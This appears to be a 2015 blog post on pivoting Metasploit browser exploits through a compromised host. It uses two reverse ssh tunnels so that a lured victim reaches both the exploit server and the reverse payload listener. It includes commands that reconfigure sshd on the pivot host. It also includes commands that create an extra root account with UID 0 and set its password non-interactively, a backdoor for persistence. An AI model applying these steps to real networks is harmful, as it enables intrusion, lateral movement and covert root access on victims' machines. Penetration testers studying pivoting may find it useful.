Tuesday, August 18, 2015

How to use ssh pivoting with Metasploit exploits that require SRVHOST/SRVPORT and LHOST/LPORT

In my quest to get ssh pivoting working with Metasploit exploits, I found many examples of how to add routes and pivot through Metasploit. What I couldn't find were examples on how to do this with exploits and payloads that require both SRVHOST/SRVPORT and LHOST/LPORT. An example of this is when the target only has port 3389 open, so you need a reverse payload to connect through your pivot host to you when hooking a browser.

When I used an established meterpreter session, backgrounded it, and entered "route add x.x.x.x x.x.x.x 1" to enter a route, when I ran an exploit using the meterpreter pivot host IP/Port for LHOST/LPORT for the payload reverse connection, metasploit would establish the LHOST/LPORT listener but would error out on the SRVHOST/SRVPORT listener when using the meterpreter pivot host IP address.

My pivot host that I have a meterpreter session on has IP address, my Kali vm has IP address 192.168.x.x, and I'm trying to lure victim to my Metasploit browser exploit server. Host doesn't have a route to my Kali host, so a pivot is required.

In the exploit settings, if I used for SRVHOST and LHOST, Metasploit would establish a server for the LHOST (reverse payload IP address) using the IP address of the meterpreter session host, but would throw errors for the SRVHOST IP address if it wasn't on my local machine. (I'm running this on Kali 2.0 if it makes any difference.)

What ended up working for me:

On Kali and your pivot host, make sure that you "echo "GatewayPorts yes" >> /etc/ssh/sshd_config" and restart the ssh service first to allow the listeners on (listening on all IP addresses), otherwise it will bind to and the port will be unreachable to the victim.

When pivoting to another network and using any exploit that requires SRVHOST/SRVPORT and LHOST/LPORT, I setup two reverse ssh tunnels with:
ssh -R 10.x.x.xPivotHostIP:8000:KaliIPaddress:8001 username@pivothostIP
ssh -R 10.x.x.xPivotHostIP:9000:KaliIPaddress:9001 username@pivothostIP
... and set my SRVHOST/SRVPORT as KaliIPaddress/8001 and LHOST/LPORT as KaliIPaddress/9001.

I set the URIPATH to "/", and lured the victim to http://10.x.x.xPivotHostIP:8000/ which would get tunneled through ssh to KaliIPaddress:8001

I wasn't able to establish two ssh tunnels with the same username as the first session would disconnect when I established the second, so I created another user first. You can create a root user from a non-interactive session with:

useradd -ou 0 -g 0 username
echo "username:password"|chpasswd